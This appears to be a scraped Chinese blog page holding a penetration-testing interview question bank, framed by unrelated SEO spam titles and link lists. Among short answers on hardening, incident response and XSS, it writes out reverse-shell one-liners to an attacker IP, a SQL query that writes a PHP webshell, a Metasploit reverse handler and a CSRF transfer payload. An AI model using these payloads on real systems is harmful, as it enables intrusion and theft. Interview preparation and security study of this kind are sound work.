当前位置: 首页 > news >正文

用flash做游戏下载网站科学城做网站公司

用flash做游戏下载网站,科学城做网站公司,奉贤做网站公司,wordpress 帝国王网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。 目录 2025年渗透测试面试题总结-拷打题库09 1. Linux系统加固降权思路 2. 系统后门检测工具 3. 绕过CDN获…

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

目录

2025年渗透测试面试题总结-拷打题库09

1. Linux系统加固降权思路

2. 系统后门检测工具

3. 绕过CDN获取真实IP

4. 给定网站的渗透思路

5. Windows与Linux提权思路

6. 开源组件高危漏洞(10+)

7. 反弹Shell命令及选择

8. CMD查询远程开放端口

9. IIS+PHP+MySQL渗透思路

10. 查询MySQL表列名

11. SQL头注入点

12. PHP命令执行函数

13. SSRF漏洞防御与绕过

14. MySQL写Shell方法

15. Metasploit反向监听命令

16. 应急响应步骤

17. 反向代理工具

18. 同源策略(SOP)

19. XSS的用途

20. XSS类型与防御

21. 存储型XSS原理

22. 快速发现XSS位置

23. DOM型XSS与反射型区别

24. 清空Referer的方法

25. Cookie的Security属性

26. XSS漏洞快速定位

27. XSS/CSRF/CRLF区别

28. CSRF不带Referer访问

2025年渗透测试面试题总结-拷打题库09

Windows、Linux、数据库的加固降权思路,任选其一
你使用什么工具来判断系统是否存在后门
如何绕过CDN获取目标网站真实IP,谈谈你的思路?
如果给你一个网站
谈一谈Windows系统与Linux系统提权的思路?
列举出您所知道的所有开源组件高危漏洞(十个以上)
反弹shell的常用命令?一般常反弹哪一种shell?为什么?
CMD命令行如何查询远程终端开放端口
服务器为IIS+PHP+MySQL,发现root权限注入漏洞,讲讲你的渗透思路
请写出Mysql5数据库中查询库’helloworld’中’users’表所有列名的语句
SQL头注入点
php中命令执行涉及到的函数
SSRF漏洞的成因防御绕过
mysql写shell有几种方法
Metasploit打开反向监听的命令
应急响应的步骤
有哪些反向代理的工具?
什么是同源策略?
XSS能用来做什么?
XSS的三种类型,防御方法
存储型xss原理?
你怎么理解xss攻击?
如何快速发现xss位置?
Domxss原理/防范
DOM型XSS与反射型XSS区别?
如何使得前端referer为空
cookie参数,security干什么的
如果SRC上报了一个XSS漏洞,payload已经写入页面,但未给出具体位置,如何快速介入?
XSS,CSRF,CRLF比较容易弄混,说说三者的原理,防御方法
csrf如何不带referer访问

1. Linux系统加固降权思路

核心措施

  1. 最小化权限
    • 使用chmod 750限制敏感目录权限(如/etc)。
    • 通过visudo限制用户sudo权限。
  2. 禁用高危服务
    • 关闭不必要的服务:systemctl disable telnet
    • 禁用Root远程登录:修改/etc/ssh/sshd_configPermitRootLogin no
  3. 日志监控
    • 配置auditd监控敏感操作(如文件修改、用户提权)。

2. 系统后门检测工具

常用工具

  • Rootkit检测
    • rkhunter --check(扫描隐藏文件、异常进程)。
    • chkrootkit(检测已知Rootkit特征)。
  • 网络分析
    • netstat -antp(检查异常连接)。
    • lsof -i :可疑端口(定位进程)。

3. 绕过CDN获取真实IP

技术手段

  1. 历史DNS记录
    • 使用SecurityTrails查询目标域名历史解析记录。
  2. 子域名探测
    • 通过subfinder扫描子域名(部分子域名可能未配置CDN)。
  3. SSL证书匹配
    • Censys中搜索相同证书的IP地址。
  4. 邮件服务器溯源
    • 分析邮件头中Received字段获取服务器IP。

4. 给定网站的渗透思路

步骤

  1. 信息收集
    • Whois查询、目录扫描(dirsearch -u http://target)。
  2. 漏洞探测
    • SQL注入:sqlmap -u "http://target/?id=1"
    • 文件上传:测试绕过.htaccess限制。
  3. 权限提升
    • 利用内核漏洞(dirtycow)或配置错误(SUID)。

5. Windows与Linux提权思路

Windows提权

  • 服务路径滥用sc config VulnService binPath= "C:\shell.exe"
  • 令牌窃取:利用incognito模仿SYSTEM令牌。

Linux提权

  • SUID提权find / -perm -4000 2>/dev/null
  • 内核漏洞:利用CVE-2021-4034(Polkit提权)。

6. 开源组件高危漏洞(10+)

组件/漏洞CVE/影响
Log4j2CVE-2021-44228(RCE)
Apache Struts2S2-045(远程代码执行)
Spring CloudCVE-2022-22963(SpEL注入)
Fastjson反序列化RCE(1.2.24及以下)
DrupalCVE-2018-7600(Drupalgeddon2)
ThinkPHP多版本RCE(如5.x路由注入)
ElasticsearchCVE-2015-1427(Groovy脚本执行)
OpenSSLHeartbleed(CVE-2014-0160)
JenkinsCVE-2018-1000861(RCE)
NginxCVE-2013-2028(栈溢出)

7. 反弹Shell命令及选择

常用命令

  • Bashbash -i >& /dev/tcp/攻击IP/端口 0>&1(兼容性强)。
  • Netcatnc -e /bin/sh 攻击IP 端口
  • Python
    pythonimport socket,os,pty;s=socket.socket();s.connect((" 攻击IP",端口));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh") 

首选原因:Bash广泛支持且无需额外依赖。


8. CMD查询远程开放端口

命令

cmdnetstat -ano | findstr "ESTABLISHED" # 查看已连接端口 telnet 目标IP 端口 # 手动测试端口连通性 

9. IIS+PHP+MySQL渗透思路

  1. 利用SQL注入
    • 通过UNION SELECT写入WebShell:SELECT '<?php system($_GET[cmd]);?>' INTO OUTFILE 'C:/inetpub/wwwroot/shell.php'
  2. UDF提权
    • 上传恶意DLL并创建函数执行系统命令。
  3. 横向移动
    • 利用数据库凭证尝试登录其他服务(如SSH、远程桌面)。

10. 查询MySQL表列名

语句

sqlSELECT COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_SCHEMA='helloworld' AND TABLE_NAME='users';

11. SQL头注入点

常见注入位置

  • HTTP头字段
    • User-AgentX-Forwarded-ForCookie
      示例
httpGET / HTTP/1.1 User-Agent: ' UNION SELECT 1,2,3 -- 

12. PHP命令执行函数

高危函数

  • system("whoami")
  • exec("cat /etc/passwd")
  • shell_exec("id")
  • passthru("ls")

13. SSRF漏洞防御与绕过

维度内容
成因未校验用户输入的URL参数
防御限制协议(仅HTTP/HTTPS)、禁用重定向
绕过使用http://127.0.0.1@evil.com 或IPv6

14. MySQL写Shell方法

  1. INTO OUTFILE:需FILE权限和可写路径。
  2. 日志文件
    sqlSET GLOBAL general_log_file='/var/www/shell.php'; SET GLOBAL general_log=ON;

15. Metasploit反向监听命令

bashmsfconsole use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST 攻击IP set LPORT 端口 run 

16. 应急响应步骤

  1. 隔离网络:断开受感染主机网络。
  2. 取证分析:使用Volatility分析内存镜像。
  3. 清除后门:删除恶意文件并修复漏洞。
  4. 恢复监控:部署HIDS(如Osquery)。

17. 反向代理工具

  • Nginx:高性能,支持负载均衡。
  • Apache:模块化设计,兼容性强。
  • HAProxy:专用于TCP/HTTP流量分发。

18. 同源策略(SOP)

定义:浏览器限制脚本仅访问同协议、域名、端口的资源。
示例https://a.com 无法读取https://b.com 的Cookie。


19. XSS的用途

  1. 窃取Cookiedocument.cookie 发送至攻击者服务器。
  2. 钓鱼攻击:伪造登录框诱导用户输入凭证。
  3. 会话劫持:通过JavaScript操作用户会话。

20. XSS类型与防御

类型防御方法
存储型输入过滤(如htmlspecialchars
反射型输出编码 + 设置HttpOnly Cookie
DOM型避免eval(),使用textContent替代

21. 存储型XSS原理

流程:用户输入恶意脚本 → 存储至数据库 → 其他用户加载页面时执行。
示例:留言板插入<script>alert(1)</script>


22. 快速发现XSS位置

  1. 输入点测试
    • 表单、URL参数、HTTP头(如Referer)。
  2. 自动化扫描
    • 使用XSStrikeBurp Suite扫描反射点。

23. DOM型XSS与反射型区别

  • DOM型:漏洞在客户端解析阶段触发,无需服务器参与。
  • 反射型:恶意脚本经服务器返回后执行。

24. 清空Referer的方法

  1. HTML标签
    html<meta name="referrer" content="no-referrer">
  2. JavaScript
    javascriptwindow.location.href = 'http://target?data=xxx';

25. Cookie的Security属性

作用:仅通过HTTPS传输Cookie,防止中间人窃取。
设置Set-Cookie: session=123; Secure


26. XSS漏洞快速定位

  1. 代码审计:搜索innerHTMLdocument.write 等高风险函数。
  2. 输入模糊测试:插入<img src=x onerror=alert(1)>观察是否弹窗。

27. XSS/CSRF/CRLF区别

漏洞原理防御方法
XSS恶意脚本在用户浏览器执行输入编码 + CSP策略
CSRF伪造用户身份发起请求Token校验 + SameSite Cookie
CRLF注入换行符控制HTTP头/日志过滤\r\n + 严格校验输入

28. CSRF不带Referer访问

绕过方法

  1. 使用<meta>标签跳转
    html<meta http-equiv="refresh" content="0; url=http://bank.com/transfer?to=attacker"> 
  2. HTTPS页面发起请求:部分浏览器允许HTTPS页面不发送Referer。
http://www.dtcms.com/a/425868.html

相关文章:

  • 网站建设公司苏州网站设计网
  • 登录网站怎么做河南卫生基层系统网站建设
  • 做智能网站seo中文含义
  • dedecms调取友情链接 网站类型闽侯网站建设
  • 免费商城自助建站企业网站开发的文献综述
  • 博尔塔拉州大型网站建设建设展示类网站的意义
  • 网站建设与规划alexa全球网站排名
  • 腾讯建设网站视频下载湖南网站建设大全
  • 网站建设特效大全电商云仓
  • 营销型网站设计建设公司一般网站建设流程有哪些步骤
  • 淘宝客网站域名备案吗app制作教程课件
  • 商务网站建设组成包括网站优化推动高质量发展心得
  • 企业信息公开网站两学一做专题教育网站
  • 提供郑州网站建设郑州住房和城乡建设官网
  • 1个ip可以做几个网站吗谷歌浏览器网页截图快捷键
  • 湖南智能网站建设多少钱电商网站开发平台哪个好
  • 电子商务网站建设成本金蝶软件免费版下载
  • html5美食网站搭建个人博客网站
  • 网站诊断工具网站建设价目
  • 上海网站建设管理flash做网站步骤
  • 广州海珠网站开发汝州市文明建设门户网站
  • 微站是什么东西seo与网站优化
  • 前端电商网站设计论文抖音代运营一般几个周期
  • 自适应企业网站用什么框架做网站建设服务描述
  • 深圳龙岗做网站建设银行官方网站购房贷款利率
  • 快速学习网站制作网站开发 在html标记后出现乱码 查看源文件显示是问好
  • 网站目录 自动网页制作与网站建设宝典 pdf
  • html5如何实现网站开发手机网站电话漂浮代码
  • 长春建站网站建设北京口碑最好的教育机构
  • 手机网站微信支付接口开发教程英文网站建设维护